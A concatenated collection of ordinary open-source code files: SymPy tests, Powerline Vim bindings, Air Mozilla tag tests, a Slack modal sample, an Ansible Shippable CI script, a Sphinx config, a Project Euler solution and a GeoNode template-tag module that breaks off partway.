d = DifferentialOperator(Derivative(f(x), x, 2), f(x))
g = Wavefunction(x**3, x)
assert qapply(d*g) == Wavefunction(6*x, x)
assert d.expr == Derivative(f(x), x, 2)
assert d.function == f(x)
assert d.variables == (x,)
assert diff(d, x) == DifferentialOperator(Derivative(f(x), x, 3), f(x))
d = DifferentialOperator(1/x*Derivative(f(x), x), f(x))
assert d.expr == 1/x*Derivative(f(x), x)
assert d.function == f(x)
assert d.variables == (x,)
assert diff(d, x) == \
DifferentialOperator(Derivative(1/x*Derivative(f(x), x), x), f(x))
assert qapply(d*g) == Wavefunction(3*x, x)
# 2D cartesian Laplacian
y = Symbol('y')
d = DifferentialOperator(Derivative(f(x, y), x, 2) +
Derivative(f(x, y), y, 2), f(x, y))
w = Wavefunction(x**3*y**2 + y**3*x**2, x, y)
assert d.expr == Derivative(f(x, y), x, 2) + Derivative(f(x, y), y, 2)
assert d.function == f(x, y)
assert d.variables == (x, y)
assert diff(d, x) == \
DifferentialOperator(Derivative(d.expr, x), f(x, y))
assert diff(d, y) == \
DifferentialOperator(Derivative(d.expr, y), f(x, y))
assert qapply(d*w) == Wavefunction(2*x**3 + 6*x*y**2 + 6*x**2*y + 2*y**3,
x, y)
# 2D polar Laplacian (th = theta)
r, th = symbols('r th')
d = DifferentialOperator(1/r*Derivative(r*Derivative(f(r, th), r), r) +
1/(r**2)*Derivative(f(r, th), th, 2), f(r, th))
w = Wavefunction(r**2*sin(th), r, (th, 0, pi))
assert d.expr == \
1/r*Derivative(r*Derivative(f(r, th), r), r) + \
1/(r**2)*Derivative(f(r, th), th, 2)
assert d.function == f(r, th)
assert d.variables == (r, th)
assert diff(d, r) == \
DifferentialOperator(Derivative(d.expr, r), f(r, th))
assert diff(d, th) == \
DifferentialOperator(Derivative(d.expr, th), f(r, th))
assert qapply(d*w) == Wavefunction(3*sin(th), r, (th, 0, pi))
|
bsd-3-clause
|
lukw00/powerline
|
powerline/bindings/vim/__init__.py
|
18
|
11437
|
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import sys
import codecs
try:
import vim
except ImportError:
vim = object()
from powerline.lib.unicode import unicode
if (
hasattr(vim, 'options')
and hasattr(vim, 'vvars')
and vim.vvars['version'] > 703
):
if sys.version_info < (3,):
def get_vim_encoding():
return vim.options['encoding'] or 'ascii'
else:
def get_vim_encoding():
return vim.options['encoding'].decode('ascii') or 'ascii'
elif hasattr(vim, 'eval'):
def get_vim_encoding():
return vim.eval('&encoding') or 'ascii'
else:
def get_vim_encoding():
return 'utf-8'
get_vim_encoding.__doc__ = (
'''Get encoding used for Vim strings
:return:
		Value of ``&encoding``. If it is empty (i.e. Vim is compiled
		without +multibyte), ``'ascii'`` is returned. When building
		documentation, ``'utf-8'`` is returned unconditionally.
'''
)
vim_encoding = get_vim_encoding()
python_to_vim_types = {
unicode: (
lambda o: b'\'' + (o.translate({
ord('\''): '\'\'',
}).encode(vim_encoding)) + b'\''
),
list: (
lambda o: b'[' + (
b','.join((python_to_vim(i) for i in o))
) + b']'
),
bytes: (lambda o: b'\'' + o.replace(b'\'', b'\'\'') + b'\''),
int: (str if str is bytes else (lambda o: unicode(o).encode('ascii'))),
}
python_to_vim_types[float] = python_to_vim_types[int]
def python_to_vim(o):
return python_to_vim_types[type(o)](o)
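# Hedged illustration of the serialization above (assuming a utf-8
# &encoding):
#   python_to_vim(1)         -> b'1'
#   python_to_vim('a')       -> b"'a'"
#   python_to_vim([1, 'b'])  -> b"[1,'b']"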
if sys.version_info < (3,):
def str_to_bytes(s):
return s
def unicode_eval(expr):
ret = vim.eval(expr)
return ret.decode(vim_encoding, 'powerline_vim_strtrans_error')
else:
def str_to_bytes(s):
return s.encode(vim_encoding)
def unicode_eval(expr):
return vim.eval(expr)
def safe_bytes_eval(expr):
return bytes(bytearray((
int(chunk) for chunk in (
vim.eval(
b'substitute(' + expr + b', ' +
b'\'^.*$\', \'\\=join(map(range(len(submatch(0))), ' +
b'"char2nr(submatch(0)[v:val])"))\', "")'
).split()
)
)))
def eval_bytes(expr):
try:
return str_to_bytes(vim.eval(expr))
except UnicodeDecodeError:
return safe_bytes_eval(expr)
def eval_unicode(expr):
try:
return unicode_eval(expr)
except UnicodeDecodeError:
return safe_bytes_eval(expr).decode(vim_encoding, 'powerline_vim_strtrans_error')
if hasattr(vim, 'bindeval'):
rettype_func = {
None: lambda f: f,
'unicode': (
lambda f: (
lambda *args, **kwargs: (
f(*args, **kwargs).decode(
vim_encoding, 'powerline_vim_strtrans_error'
))))
}
rettype_func['int'] = rettype_func['bytes'] = rettype_func[None]
rettype_func['str'] = rettype_func['bytes'] if str is bytes else rettype_func['unicode']
def vim_get_func(f, rettype=None):
'''Return a vim function binding.'''
try:
func = vim.bindeval('function("' + f + '")')
except vim.error:
return None
else:
return rettype_func[rettype](func)
else:
rettype_eval = {
None: getattr(vim, 'eval', None),
'int': lambda expr: int(vim.eval(expr)),
'bytes': eval_bytes,
'unicode': eval_unicode,
}
rettype_eval['str'] = rettype_eval[None]
class VimFunc(object):
'''Evaluate a vim function using vim.eval().
This is a fallback class for older vim versions.
'''
__slots__ = ('f', 'eval')
def __init__(self, f, rettype=None):
self.f = f.encode('utf-8')
self.eval = rettype_eval[rettype]
def __call__(self, *args):
return self.eval(self.f + b'(' + (b','.join((
python_to_vim(o) for o in args
))) + b')')
vim_get_func = VimFunc
def vim_get_autoload_func(f, rettype=None):
func = vim_get_func(f)
if not func:
vim.command('runtime! ' + f.replace('#', '/')[:f.rindex('#')] + '.vim')
func = vim_get_func(f)
return func
if hasattr(vim, 'Function'):
def vim_func_exists(f):
try:
vim.Function(f)
except ValueError:
return False
else:
return True
else:
def vim_func_exists(f):
try:
return bool(int(vim.eval('exists("*{0}")'.format(f))))
except vim.error:
return False
if type(vim) is object:
vim_get_func = lambda *args, **kwargs: None
_getbufvar = vim_get_func('getbufvar')
_vim_exists = vim_get_func('exists', rettype='int')
# It may crash on some old vim versions and I do not remember in which patch
# I fixed this crash.
if hasattr(vim, 'vvars') and vim.vvars[str('version')] > 703:
_vim_to_python_types = {
getattr(vim, 'Dictionary', None) or type(vim.bindeval('{}')):
lambda value: dict((
(_vim_to_python(k), _vim_to_python(v))
for k, v in value.items()
)),
getattr(vim, 'List', None) or type(vim.bindeval('[]')):
lambda value: [_vim_to_python(item) for item in value],
getattr(vim, 'Function', None) or type(vim.bindeval('function("mode")')):
lambda _: None,
}
def vim_getvar(varname):
return _vim_to_python(vim.vars[str(varname)])
def bufvar_exists(buffer, varname):
buffer = buffer or vim.current.buffer
return varname in buffer.vars
def vim_getwinvar(segment_info, varname):
return _vim_to_python(segment_info['window'].vars[str(varname)])
def vim_global_exists(name):
try:
vim.vars[name]
except KeyError:
return False
else:
return True
else:
_vim_to_python_types = {
dict: (lambda value: dict(((k, _vim_to_python(v)) for k, v in value.items()))),
list: (lambda value: [_vim_to_python(i) for i in value]),
}
def vim_getvar(varname):
varname = 'g:' + varname
if _vim_exists(varname):
return vim.eval(varname)
else:
raise KeyError(varname)
def bufvar_exists(buffer, varname):
if not buffer or buffer.number == vim.current.buffer.number:
return int(vim.eval('exists("b:{0}")'.format(varname)))
else:
return int(vim.eval(
'has_key(getbufvar({0}, ""), {1})'.format(buffer.number, varname)
))
def vim_getwinvar(segment_info, varname):
result = vim.eval('getwinvar({0}, "{1}")'.format(segment_info['winnr'], varname))
if result == '':
if not int(vim.eval('has_key(getwinvar({0}, ""), "{1}")'.format(segment_info['winnr'], varname))):
raise KeyError(varname)
return result
def vim_global_exists(name):
return int(vim.eval('exists("g:' + name + '")'))
def vim_command_exists(name):
return _vim_exists(':' + name)
if sys.version_info < (3,):
getbufvar = _getbufvar
else:
_vim_to_python_types[bytes] = lambda value: value.decode(vim_encoding)
def getbufvar(*args):
return _vim_to_python(_getbufvar(*args))
_id = lambda value: value
def _vim_to_python(value):
return _vim_to_python_types.get(type(value), _id)(value)
if hasattr(vim, 'options'):
def vim_getbufoption(info, option):
return info['buffer'].options[str(option)]
def vim_getoption(option):
return vim.options[str(option)]
def vim_setoption(option, value):
vim.options[str(option)] = value
else:
def vim_getbufoption(info, option):
return getbufvar(info['bufnr'], '&' + option)
def vim_getoption(option):
return vim.eval('&g:' + option)
def vim_setoption(option, value):
vim.command('let &g:{option} = {value}'.format(
option=option, value=python_to_vim(value)))
if hasattr(vim, 'tabpages'):
current_tabpage = lambda: vim.current.tabpage
list_tabpages = lambda: vim.tabpages
def list_tabpage_buffers_segment_info(segment_info):
return (
{'buffer': window.buffer, 'bufnr': window.buffer.number}
for window in segment_info['tabpage'].windows
)
else:
class FalseObject(object):
@staticmethod
def __nonzero__():
return False
__bool__ = __nonzero__
def get_buffer(number):
for buffer in vim.buffers:
if buffer.number == number:
return buffer
raise KeyError(number)
class WindowVars(object):
__slots__ = ('tabnr', 'winnr')
def __init__(self, window):
self.tabnr = window.tabnr
self.winnr = window.number
def __getitem__(self, key):
has_key = vim.eval('has_key(gettabwinvar({0}, {1}, ""), "{2}")'.format(self.tabnr, self.winnr, key))
if has_key == '0':
raise KeyError
return vim.eval('gettabwinvar({0}, {1}, "{2}")'.format(self.tabnr, self.winnr, key))
def get(self, key, default=None):
try:
return self[key]
except KeyError:
return default
class Window(FalseObject):
		__slots__ = ('tabnr', 'number', 'vars')
def __init__(self, tabnr, number):
self.tabnr = tabnr
self.number = number
self.vars = WindowVars(self)
@property
def buffer(self):
return get_buffer(int(vim.eval('tabpagebuflist({0})[{1}]'.format(self.tabnr, self.number - 1))))
class Tabpage(FalseObject):
__slots__ = ('number',)
def __init__(self, number):
self.number = number
def __eq__(self, tabpage):
if not isinstance(tabpage, Tabpage):
raise NotImplementedError
return self.number == tabpage.number
@property
def window(self):
return Window(self.number, int(vim.eval('tabpagewinnr({0})'.format(self.number))))
def _last_tab_nr():
return int(vim.eval('tabpagenr("$")'))
def current_tabpage():
return Tabpage(int(vim.eval('tabpagenr()')))
def list_tabpages():
return [Tabpage(nr) for nr in range(1, _last_tab_nr() + 1)]
class TabBufSegmentInfo(dict):
def __getitem__(self, key):
try:
return super(TabBufSegmentInfo, self).__getitem__(key)
except KeyError:
if key != 'buffer':
raise
else:
buffer = get_buffer(super(TabBufSegmentInfo, self).__getitem__('bufnr'))
self['buffer'] = buffer
return buffer
def list_tabpage_buffers_segment_info(segment_info):
return (
TabBufSegmentInfo(bufnr=int(bufnrstr))
for bufnrstr in vim.eval('tabpagebuflist({0})'.format(segment_info['tabnr']))
)
class VimEnviron(object):
@staticmethod
def __getitem__(key):
return vim.eval('$' + key)
@staticmethod
def get(key, default=None):
return vim.eval('$' + key) or default
@staticmethod
def __setitem__(key, value):
return vim.command(
'let ${0}="{1}"'.format(
key,
				value.replace('\\', '\\\\')
				.replace('"', '\\"')
.replace('\n', '\\n')
.replace('\0', '')
)
)
if sys.version_info < (3,):
def buffer_name(segment_info):
return segment_info['buffer'].name
else:
vim_bufname = vim_get_func('bufname', rettype='bytes')
def buffer_name(segment_info):
try:
name = segment_info['buffer'].name
except UnicodeDecodeError:
return vim_bufname(segment_info['bufnr'])
else:
return name.encode(segment_info['encoding']) if name else None
vim_strtrans = vim_get_func('strtrans', rettype='unicode')
def powerline_vim_strtrans_error(e):
if not isinstance(e, UnicodeDecodeError):
raise NotImplementedError
text = vim_strtrans(e.object[e.start:e.end])
return (text, e.end)
codecs.register_error('powerline_vim_strtrans_error', powerline_vim_strtrans_error)
did_autocmd = False
buffer_caches = []
def register_buffer_cache(cachedict):
global did_autocmd
global buffer_caches
from powerline.vim import get_default_pycmd, pycmd
if not did_autocmd:
import __main__
__main__.powerline_on_bwipe = on_bwipe
vim.command('augroup Powerline')
vim.command(' autocmd! BufWipeout * :{pycmd} powerline_on_bwipe()'.format(
pycmd=(pycmd or get_default_pycmd())))
vim.command('augroup END')
did_autocmd = True
buffer_caches.append(cachedict)
return cachedict
def on_bwipe():
global buffer_caches
bufnr = int(vim.eval('expand("<abuf>")'))
for cachedict in buffer_caches:
cachedict.pop(bufnr, None)
environ = VimEnviron()
def create_ruby_dpowerline():
vim.command((
'''
ruby
if $powerline == nil
class Powerline
end
$powerline = Powerline.new
end
'''
))
|
mit
|
mythmon/airmozilla
|
airmozilla/manage/tests/views/test_tags.py
|
1
|
3865
|
import json
from nose.tools import eq_, ok_
from funfactory.urlresolvers import reverse
from airmozilla.main.models import Tag, Event
from .base import ManageTestCase
class TestTags(ManageTestCase):
def test_tags(self):
"""Tag management pages return successfully."""
response = self.client.get(reverse('manage:tags'))
eq_(response.status_code, 200)
def test_tags_data(self):
Tag.objects.create(name='testing')
url = reverse('manage:tags_data')
response = self.client.get(url)
eq_(response.status_code, 200)
content = json.loads(response.content)
ok_(content['tags'])
ok_(content['urls'])
eq_(
content['urls']['manage:tag_edit'],
reverse('manage:tag_edit', args=('0',))
)
eq_(
content['urls']['manage:tag_remove'],
reverse('manage:tag_remove', args=('0',))
)
def test_tag_remove(self):
"""Removing a tag works correctly and leaves associated events
with null tags."""
event = Event.objects.get(id=22)
tag = Tag.objects.create(name='testing')
event.tags.add(tag)
assert tag in event.tags.all()
event.tags.add(Tag.objects.create(name='othertag'))
eq_(event.tags.all().count(), 2)
self._delete_test(tag, 'manage:tag_remove', 'manage:tags')
event = Event.objects.get(id=22)
eq_(event.tags.all().count(), 1)
def test_tag_edit(self):
"""Test tag editor; timezone switch works correctly."""
tag = Tag.objects.create(name='testing')
url = reverse('manage:tag_edit', kwargs={'id': tag.id})
response = self.client.get(url)
eq_(response.status_code, 200)
response = self.client.post(url, {
'name': 'different',
})
self.assertRedirects(response, reverse('manage:tags'))
tag = Tag.objects.get(id=tag.id)
eq_(tag.name, 'different')
Tag.objects.create(name='alreadyinuse')
response = self.client.post(url, {
'name': 'ALREADYINUSE',
})
eq_(response.status_code, 302)
        # because this is causing a duplicate it redirects back
self.assertRedirects(response, url)
eq_(Tag.objects.filter(name__iexact='Alreadyinuse').count(), 2)
def test_tag_merge(self):
t1 = Tag.objects.create(name='Tagg')
t2 = Tag.objects.create(name='TaGG')
t3 = Tag.objects.create(name='tAgg')
event = Event.objects.get(title='Test event')
event.tags.add(t1)
event2 = Event.objects.create(
title='Other Title',
start_time=event.start_time,
)
event2.tags.add(t1)
event2.tags.add(t2)
event3 = Event.objects.create(
title='Other Title Again',
start_time=event.start_time,
)
event3.tags.add(t2)
event3.tags.add(t3)
# t1 is now repeated
edit_url = reverse('manage:tag_edit', args=(t1.id,))
response = self.client.get(edit_url)
eq_(response.status_code, 200)
merge_url = reverse('manage:tag_merge', args=(t1.id,))
ok_(merge_url in response.content)
response = self.client.post(merge_url, {'keep': t2.id})
eq_(response.status_code, 302)
self.assertRedirects(
response,
reverse('manage:tags')
)
eq_(Tag.objects.filter(name__iexact='TAGG').count(), 1)
eq_(Tag.objects.filter(name='TaGG').count(), 1)
eq_(Tag.objects.filter(name='Tagg').count(), 0)
eq_(Tag.objects.filter(name='tAgg').count(), 0)
eq_(Event.objects.filter(tags__name='TaGG').count(), 3)
eq_(Event.objects.filter(tags__name='Tagg').count(), 0)
eq_(Event.objects.filter(tags__name='tAgg').count(), 0)
|
bsd-3-clause
|
slackhq/python-slackclient
|
integration_tests/samples/basic_usage/views_2.py
|
1
|
3819
|
import json
import logging
logging.basicConfig(level=logging.DEBUG)
# ---------------------
# Slack WebClient
# ---------------------
import os
from slack_sdk.web import WebClient
from slack_sdk.errors import SlackApiError
from slack_sdk.signature import SignatureVerifier
from slack_sdk.models.blocks import InputBlock, SectionBlock
from slack_sdk.models.blocks.block_elements import PlainTextInputElement
from slack_sdk.models.blocks.basic_components import PlainTextObject
from slack_sdk.models.views import View
client = WebClient(token=os.environ["SLACK_BOT_TOKEN"])
signature_verifier = SignatureVerifier(os.environ["SLACK_SIGNING_SECRET"])
# ---------------------
# Flask App
# ---------------------
# pip3 install flask
from flask import Flask, request, make_response, jsonify
app = Flask(__name__)
@app.route("/slack/events", methods=["POST"])
def slack_app():
if not signature_verifier.is_valid_request(request.get_data(), request.headers):
return make_response("invalid request", 403)
if "payload" in request.form:
payload = json.loads(request.form["payload"])
if payload["type"] == "shortcut" and payload["callback_id"] == "test-shortcut":
# Open a new modal by a global shortcut
try:
view = View(
type="modal",
callback_id="modal-id",
title=PlainTextObject(text="Awesome Modal"),
submit=PlainTextObject(text="Submit"),
close=PlainTextObject(text="Cancel"),
blocks=[
InputBlock(
block_id="b-id",
label=PlainTextObject(text="Input label"),
element=PlainTextInputElement(action_id="a-id"),
)
],
)
api_response = client.views_open(
trigger_id=payload["trigger_id"],
view=view,
)
return make_response("", 200)
except SlackApiError as e:
code = e.response["error"]
return make_response(f"Failed to open a modal due to {code}", 200)
if (
payload["type"] == "view_submission"
and payload["view"]["callback_id"] == "modal-id"
):
# Handle a data submission request from the modal
submitted_data = payload["view"]["state"]["values"]
print(
submitted_data
) # {'b-id': {'a-id': {'type': 'plain_text_input', 'value': 'your input'}}}
return make_response(
jsonify(
{
"response_action": "update",
"view": View(
type="modal",
callback_id="modal-id",
title=PlainTextObject(text="Accepted"),
close=PlainTextObject(text="Close"),
blocks=[
SectionBlock(
block_id="b-id",
text=PlainTextObject(
text="Thanks for submitting the data!"
),
)
],
).to_dict(),
}
),
200,
)
return make_response("", 404)
if __name__ == "__main__":
# export SLACK_SIGNING_SECRET=***
    # export SLACK_BOT_TOKEN=xoxb-***
# export FLASK_ENV=development
# python3 integration_tests/samples/basic_usage/views_2.py
app.run("localhost", 3000)
# ngrok http 3000
|
mit
|
pgmillon/ansible
|
test/utils/shippable/tools/run.py
|
29
|
3634
|
#!/usr/bin/env python
# PYTHON_ARGCOMPLETE_OK
# (c) 2016 Red Hat, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
"""CLI tool for starting new Shippable CI runs."""
from __future__ import print_function
# noinspection PyCompatibility
import argparse
import json
import os
import requests
try:
import argcomplete
except ImportError:
argcomplete = None
def main():
"""Main program body."""
api_key = get_api_key()
parser = argparse.ArgumentParser(description='Start a new Shippable run.')
parser.add_argument('project',
metavar='account/project',
help='Shippable account/project')
target = parser.add_mutually_exclusive_group()
target.add_argument('--branch',
help='branch name')
target.add_argument('--run',
metavar='ID',
help='Shippable run ID')
parser.add_argument('--key',
metavar='KEY',
default=api_key,
required=not api_key,
help='Shippable API key')
parser.add_argument('--env',
nargs=2,
metavar=('KEY', 'VALUE'),
action='append',
help='environment variable to pass')
if argcomplete:
argcomplete.autocomplete(parser)
args = parser.parse_args()
headers = dict(
Authorization='apiToken %s' % args.key,
)
# get project ID
data = dict(
projectFullNames=args.project,
)
url = 'https://api.shippable.com/projects'
response = requests.get(url, data, headers=headers)
if response.status_code != 200:
raise Exception(response.content)
result = response.json()
if len(result) != 1:
raise Exception(
'Received %d items instead of 1 looking for %s in:\n%s' % (
len(result),
args.project,
json.dumps(result, indent=4, sort_keys=True)))
project_id = response.json()[0]['id']
# new build
data = dict(
globalEnv=dict((kp[0], kp[1]) for kp in args.env or [])
)
if args.branch:
data['branchName'] = args.branch
elif args.run:
data['runId'] = args.run
url = 'https://api.shippable.com/projects/%s/newBuild' % project_id
response = requests.post(url, json=data, headers=headers)
if response.status_code != 200:
raise Exception("HTTP %s: %s\n%s" % (response.status_code, response.reason, response.content))
print(json.dumps(response.json(), indent=4, sort_keys=True))
def get_api_key():
"""
    :rtype: str
"""
key = os.environ.get('SHIPPABLE_KEY', None)
if key:
return key
path = os.path.join(os.environ['HOME'], '.shippable.key')
try:
with open(path, 'r') as key_fd:
return key_fd.read().strip()
except IOError:
return None
if __name__ == '__main__':
main()
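# Example invocation (hypothetical project name and API key):
#
#   SHIPPABLE_KEY=0123abcd ./run.py ansible/ansible --branch devel --env COMPLETE yes
#
# This resolves the project id via GET /projects, then POSTs
# {"branchName": "devel", "globalEnv": {"COMPLETE": "yes"}} to
# /projects/<project_id>/newBuild and prints the JSON response.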
|
gpl-3.0
|
bobthekingofegypt/servo
|
tests/wpt/web-platform-tests/tools/py/doc/conf.py
|
218
|
8482
|
# -*- coding: utf-8 -*-
#
# py documentation build configuration file, created by
# sphinx-quickstart on Thu Oct 21 08:30:10 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.txt'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'py'
copyright = u'2010, holger krekel et. al.'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# The full version, including alpha/beta/rc tags.
import py
release = py.__version__
version = ".".join(release.split(".")[:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'py'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'py.tex', u'py Documentation',
u'holger krekel et. al.', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'py', u'py Documentation',
[u'holger krekel et. al.'], 1)
]
autodoc_member_order = "bysource"
autodoc_default_flags = ['inherited-members']
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'py'
epub_author = u'holger krekel et. al.'
epub_publisher = u'holger krekel et. al.'
epub_copyright = u'2010, holger krekel et. al.'
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
|
mpl-2.0
|
WalrusCow/euler
|
Solutions/problem61.py
|
1
|
2077
|
from collections import defaultdict
def triangle(n):
return int((n * (n + 1)) / 2)
def square(n):
return n * n
def pentagon(n):
return int((n * (3 * n - 1)) / 2)
def hexagon(n):
return n * (2 * n - 1)
def heptagon(n):
return int((n * (5 * n - 3)) / 2)
def octagon(n):
return n * (3 * n - 2)
def find_values_for_digits(first_two, poly_values):
    # Iterate (poly_num, digit_map) pairs; iterating the dict directly would
    # yield only the keys, so the two-name unpacking would fail.
    return {poly_num: set(val_map[first_two])
            for poly_num, val_map in poly_values.items()}
def find_longest_sequence(poly_values, sequence):
if not poly_values:
if sequence[-1] % 100 == sequence[0] // 100:
return sequence
else:
# The ends don't match -- remove the last one :)
return sequence[:-1]
best_sequence = sequence
first_two = sequence[-1] % 100
for poly_num, digit_map in poly_values.items():
for last_two in digit_map[first_two]:
new_sequence = find_longest_sequence(
{p: dm for p, dm in poly_values.items() if p != poly_num},
sequence + [first_two * 100 + last_two],
)
if len(new_sequence) > len(best_sequence):
best_sequence = new_sequence
return best_sequence
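# Worked example of the digit maps consumed above (built in __main__ below):
# square(57) == 3249, so poly_values[4][32] contains 49; any successor in a
# cyclic chain must then start with 49, i.e. be some value v with v // 100 == 49.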
if __name__ == '__main__':
poly_funs = [triangle, square, pentagon, hexagon, heptagon, octagon]
poly_values = defaultdict(lambda: defaultdict(set))
for poly_num, poly_fun in enumerate(poly_funs, start=3):
for n in range(1, 10000):
val = poly_fun(n)
if val >= 10000:
break
elif val >= 1000:
poly_values[poly_num][val // 100].add(val % 100)
for first_two, last_twos in poly_values.pop(3).items():
for last_two in last_twos:
sequence = find_longest_sequence(
poly_values,
[first_two * 100 + last_two],
)
if len(sequence) == 6:
print('Sequence: {}'.format(', '.join(map(str, sequence))))
print('Sum is {}'.format(sum(sequence)))
|
mit
|
timlinux/geonode
|
geonode/social/templatetags/social_tags.py
|
5
|
2852
|
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2016 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
from django import template
from django.utils.translation import ugettext_lazy as _
register = template.Library()
def get_data(action, key, default=None):
"""
Checks for a key in the action's JSON data field. Returns default if the key does not exist.
"""
if hasattr(action, 'data') and action.data:
return action.data.get(key, default)
else:
return default
@register.inclusion_tag('social/_activity_item.html')
def activity_item(action, **kwargs):
"""
Provides a location to manipulate an action in preparation for display.
"""
actor = action.actor
activity_class = 'activity'
verb = action.verb
username = actor.username
target = action.target
object_type = None
object = action.action_object
raw_action = get_data(action, 'raw_action')
object_name = get_data(action, 'object_name')
preposition = _("to")
fragment = None
if object:
object_type = object.__class__._meta.object_name.lower()
if target:
target_type = target.__class__._meta.object_name.lower() # noqa
if actor is None:
return str()
# Set the item's class based on the object.
if object:
if object_type == 'comment':
activity_class = 'comment'
preposition = _("on")
object = None
